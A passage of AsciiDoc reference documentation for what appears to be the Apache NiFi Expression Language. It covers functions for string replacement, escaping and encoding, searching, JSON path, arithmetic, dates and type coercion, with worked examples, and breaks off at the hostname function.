[.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== replaceEmpty\n\n*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or\n\tif the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" has the value \" \", then the Expression `${filename:replaceEmpty('abc')}` will return\n\t\"a brand new filename.txt\", while `${hello:replaceEmpty('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n[[encode]]\n== Encode\/Decode Functions\n\nEach of the following functions will encode a string according the rules of the given data format.\n\n\n\n\n[.function]\n=== escapeJson\n\n*Description*: [.description]#This function prepares the Subject to be inserted into JSON document by escaping the characters\n in the String using Json String rules. The function correctly escapes quotes and control-chars (tab, backslash,\n cr, ff, etc.)#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \"Stop!\"', then the Expression `${message:escapeJson()}`\n will return 'He didn't say, \\\"Stop!\\\"'\n\n\n\n\n[.function]\n=== escapeXml\n\n*Description*: [.description]#This function prepares the Subject to be inserted into XML document by escaping the characters\n in a String using XML entities. The function correctly escapes quotes, apostrophe, ampersand, <, > and\n control-chars.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeXml()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== escapeCsv\n\n*Description*: [.description]#This function prepares the Subject to be inserted into CSV document by escaping the characters\n in a String using the rules in RFC 4180. The function correctly escapes quotes and surround the string in quotes if needed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'But finally, she left', then the Expression `${message:escapeCsv()}`\n will return '\"But finally, she left\"'\n\n\n\n\n[.function]\n=== escapeHtml3\n\n*Description*: [.description]#This function prepares the Subject to be inserted into HTML document by escaping the characters\n in a String using the HTML entities. Supports only the HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml3()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== escapeHtml4\n\n*Description*: [.description]#This function prepares the Subject to be inserted into HTML document by escaping the characters\n in a String using the HTML entities. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"bread\" & \"butter\"', then the Expression `${message:escapeHtml4()}`\n will return '"bread" & "butter"'\n\n\n\n\n[.function]\n=== unescapeJson\n\n*Description*: [.description]#This function unescapes any Json literals found in the String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is 'He didn't say, \\\"Stop!\\\"', then the Expression `${message:unescapeJson()}`\n will return 'He didn't say, \"Stop!\"'\n\n\n\n\n[.function]\n=== unescapeXml\n\n*Description*: [.description]#This function unescapes a string containing XML entity escapes to a string containing the\n actual Unicode characters corresponding to the escapes. Supports only the five basic XML entities (gt, lt,\n quot, amp, apos).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeXml()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeCsv\n\n*Description*: [.description]#This function unescapes a String from a CSV document according to the rules of RFC 4180.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '\"But finally, she left\"', then the Expression `${message:unescapeCsv()}`\n will return 'But finally, she left'\n\n\n\n\n[.function]\n=== unescapeHtml3\n\n*Description*: [.description]#This function unescapes a string containing HTML 3 entity to a string containing the\n actual Unicode characters corresponding to the escapes. Supports only HTML 3.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeHtml3()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== unescapeHtml4\n\n*Description*: [.description]#This function unescapes a string containing HTML 4 entity to a string containing the\n actual Unicode characters corresponding to the escapes. Supports all known HTML 4.0 entities.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"message\" attribute is '"bread" & "butter"', then the Expression `${message:unescapeHtml4()}`\n will return '\"bread\" & \"butter\"'\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value\n\t\"https:\/\/nifi.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.apache.org\/some value with spaces\".\n\n\n\n\n[.function]\n=== base64Encode\n\n*Description*: [.description]#Returns a Base64 encoded string. This is useful for being able to transfer binary data as ascii.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can Base64-Encoded an attribute named \"payload\" by using the Expression\n\t `${payload:base64Encode()}` If the attribute payload had a value of \"admin:admin\"\n\t then the Expression `${payload:base64Encode()}` will return \"YWRtaW46YWRtaW4=\".\n\n\n\n\n[.function]\n=== base64Decode\n\n*Description*: [.description]#Reverses the Base64 encoding on given string.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a Base64-Encoded attribute named \"payload\" with the value\n\t\"YWRtaW46YWRtaW4=\", then the Expression\n\t`${payload:base64Decode()}` will return \"admin:admin\".\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== in\n\n*Description*: [.description]#Returns `true` if the Subject is matching one of the provided arguments.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value1_# : [.argDesc]#First possible matching value#\n\t- [.argName]#_valueN_# : [.argDesc]#Nth possible matching value#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"myEnum\" attribute has the value \"JOHN\", then the Expression\n\t`${myEnum:in(\"PAUL\", \"JOHN\", \"MIKE\")}` will return `true`. `${myEnum:in(\"RED\", \"GREEN\", \"BLUE\")}` will\n\treturn `false`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n[.function]\n=== jsonPath\n\n*Description*: [.description]#The `jsonPath` function generates a string by evaluating the Subject as JSON and applying a JSON\n path expression. An empty string is generated if the Subject does not contain valid JSON, the _jsonPath_ is invalid, or the path\n\tdoes not exist in the Subject. If the evaluation results in a scalar value, the string representation of scalar value is\n\tgenerated. Otherwise a string representation of the JSON result is generated. A JSON array of length 1 is special cased\n\twhen `[0]` is a scalar, the string representation of `[0]` is generated.^1^#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\t [.argName]#_jsonPath_# : [.argDesc]#the JSON path expression used to evaluate the Subject.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"myJson\" attribute is\n\n..........\n{\n \"firstName\": \"John\",\n \"lastName\": \"Smith\",\n \"isAlive\": true,\n \"age\": 25,\n \"address\": {\n \"streetAddress\": \"21 2nd Street\",\n \"city\": \"New York\",\n \"state\": \"NY\",\n \"postalCode\": \"10021-3100\"\n },\n \"phoneNumbers\": [\n {\n \"type\": \"home\",\n \"number\": \"212 555-1234\"\n },\n {\n \"type\": \"office\",\n \"number\": \"646 555-4567\"\n }\n ],\n \"children\": [],\n \"spouse\": null\n}\n..........\n\n.jsonPath Examples\n|===================================================================\n| Expression | Value\n| `${myJson:jsonPath('$.firstName')}` | `John`\n| `${myJson:jsonPath('$.address.postalCode')}` | `10021-3100`\n| `${myJson:jsonPath('$.phoneNumbers[?(@.type==\"home\")].number')}`^1^ | `212 555-1234`\n| `${myJson:jsonPath('$.phoneNumbers')}` | `[{\"type\":\"home\",\"number\":\"212 555-1234\"},{\"type\":\"office\",\"number\":\"646 555-4567\"}]`\n| `${myJson:jsonPath('$.missing-path')}` | _empty_\n| `${myJson:jsonPath('$.bad-json-path..')}` | _exception bulletin_\n|===================================================================\n\nAn empty subject value or a subject value with an invalid JSON document results in an exception bulletin.\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\nFor those functions that support Decimal and Number (whole number) types, the return value type depends on the input types. If either the\nsubject or argument are a Decimal then the result will be a Decimal. If both values are Numbers then the result will be a Number. This includes\nDivide. This is to preserve backwards compatibility and to not force rounding errors.\n\n\n[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiple the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides the Subject by a numeric value and returns the result.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number or Decimal#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on input types)#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional second argument can be used to indicate the minimum number of characters to be used. If the converted value has fewer than this number of characters, the number will be padded with leading zeroes. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n[.function]\n=== fromRadix\n\n*Description*: [.description]#Converts the Subject from a specified Radix (or number base) to a base ten whole number. The subject will converted as is, without interpretation, and all characters must be valid for the base being converted from. For example converting \"0xFF\" from hex will not work due to \"x\" being a invalid hex character. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Subject Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1234A, then the following Expressions will yield\n\tthe following results:\n\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:fromRadix(11)}` | `17720`\n| `${fileSize:fromRadix(16)}` | `74570`\n| `${fileSize:fromRadix(20)}` | `177290`\n|=======================================================================================\n\n[.function]\n=== random\n\n*Description*: [.description]#Returns a random whole number ( 0 to 2^63 - 1) using an insecure random number generator.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: `${random():mod(10):plus(1)}` returns random number between 1 and 10 inclusive.\n\n[.function]\n=== math\n\n*Description*: [.description]#ADVANCED FEATURE. This expression is designed to be used by advanced users only. It utilizes Java Reflection to run arbitrary java.lang.Math static methods. The exact API will depend on the version of Java you are running. The Java 8 API can be found here: link:https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html[https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Math.html^]\n +\nIn order to run the correct method, the parameter types must be correct. The Expression Language \"Number\" (whole number) type is interpreted as a Java \"long\". The \"Decimal\" type is interpreted as a Java \"double\". Running the desired method may require calling \"toNumber()\" or \"toDecimal()\" in order to \"cast\" the value to the desired type. This also is important to remember when cascading \"math()\" calls since the return type depends on the method that was run.#\n\n*Subject Type*: [.subject .subjectless]#Subjectless, Number or Decimal (depending on the desired method to run)#\n\n*Arguments*:\n\n\t- [.argName]#_Method_# : [.argDesc]#The name of the Java Math method to run#\n\t- [.argName]#_Optional Argument_# : [.argDesc]#Optional argument that acts as the second parameter to the method.#\n\n*Return Type*: [.returnType]#Number or Decimal (depending on method run)#\n\n*Examples*:\n\n\t- ${math(\"random\")} runs Math.random().\n\n\t- ${literal(2):toDecimal:math(\"pow\", 2.5)} runs Math.pow(2D,2.5D).\n\n\t- ${literal(64):toDouble():math(\"cbrt\"):toNumber():math(\"max\", 5)} runs Math.max((Double.valueOf(Math.cbrt(64D))).longValue(), 5L). Note that the toDecimal() is needed because \"cbrt\" takes a \"double\" as input and the \"64\" will get interpreted as a long. The \"toDecimal()\" call is necessary to correctly call the method. that the \"toNumber()\" call is necessary because \"cbrt\" returns a double and the \"max\" method is must have parameters of the same type and \"5\" is interpreted as a long.\n\n\t- ${literal(5.4):math(\"scalb\", 2)} runs Math.scalb(5.4, 2). This example is important because NiFi EL treats all whole numbers as \"longs\" and there is no concept of an \"int\". \"scalb\" takes a second parameter of an \"int\" and it is not overloaded to accept longs so it could not be run without special type handling. In the instance where the Java method cannot be found using parameters of type \"double\" and \"long\" the \"math()\" EL function will attempt to find a Java method with the same name but parameters of \"double\" and \"int\".\n\n\t- ${first:toDecimal():math(\"pow\", ${second:toDecimal()})} where attributes evaluate to \"first\" = 2.5 and \"second\" = 2. This example runs Math.pow(2.5D, 2D). The explicit calls to toDecimal() are important because of the dynamic nature of EL. When creating the flow, the user is unaware if the expression language values will be able to be interpreted as a whole number or not. In this example without the explicit calls \"toDecimal\" the \"math\" function would attempt to run a Java method \"pow\" with types \"double\" and \"long\" (which doesn't exist).\n\n[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT on January 1, 1970. The number will be evaluated using the local\n\ttime zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use (in the Java TimeZone syntax)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `2014\/12\/31 20:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"America\/Los_Angeles\")}` | `2014\/12\/31 12:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS\\'Z'\", \"Asia\/Tokyo\")}` | `2015\/01\/01 05:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\", \"GMT\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS\\'Z'\", \"GMT\")}` | `20:36:03.264Z`\n| `${time:format(\"yyyy\", \"GMT\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Date data type, based on the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat syntax. The Subject is expected to be a String that is formatted\n\taccording the argument. The date will be evaluated using the local time zone unless specified in the second optional argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#\n\t\t- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use when parsing the Subject, in the Java TimeZone syntax.#\n\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy', 'GMT')}` will return a Date data type with a value representing Midnight GMT on\n\tJanuary 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\", \"GMT\")}` will result in a Date data type for\n\t15:36:03.264 GMT on December 31, 2014.\n\nOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. For example,\nif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\nchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n\n\n[.function]\n=== now\n\n*Description*: [.description]#Returns the current date and time as a Date data type object.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Date#\n\n*Examples*: We can get the current date and time as a Date data type by using the `now` function: `${now()}`. As an example,\n\ton Wednesday December 31st 2014 at 36 minutes after 3pm and 36.123 seconds EST `${now()}` would be evaluated to be a\n\tDate type representing that time. Since whole Expression Language expressions can only return Strings it would formatted as\n\t`Wed Dec 31 15:36:03 EST 2014` when the expression completes.\n\nUtilizing the <<toNumber>> method, `now` can provide the current date and time as the number of milliseconds since\nMidnight GMT on January 1, 1970. For instance, if instead of executing `${now()}` in the previous example `${now():toNumber()}`\nwas run then it would output `1453843201123`. This method provides millisecond-level precision and provides the ability to\nmanipulate the value.\n\n.now Examples\n|==================================================================================================================\n| Expression | Value\n| `${now()}` | A Date type representing the current date and time to the nearest millisecond\n| `${now():toNumber()}` | The number of milliseconds since midnight GMT Jan 1, 1970 (`1453843201123`, for example)\n| `${now():toNumber():minus(86400000)` | A number presenting the time 24 hours ago\n| `${now():format('yyyy')}` | The current year\n| `${now():toNumber():minus(86400000):format('E')}` | The day of the week that was yesterday,\n\t\t\t\t\t\t\t\t\t\t\t\t\t as a 3-letter abbreviation (For example, `Wed`)\n|==================================================================================================================\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String, Decimal, or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the attribute value of \"fileSize\" to a number.\n\n\n[.function]\n=== toDecimal\n\n*Description*: [.description]#Coerces the Subject into a Decimal#\n\n*Subject Type*: [.subject]#String, Whole Number or Date#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Decimal#\n\n*Examples*: The Expression `${fileSize:toDecimal()}` converts the attribute value of \"fileSize\" to a decimal.\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expression `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. 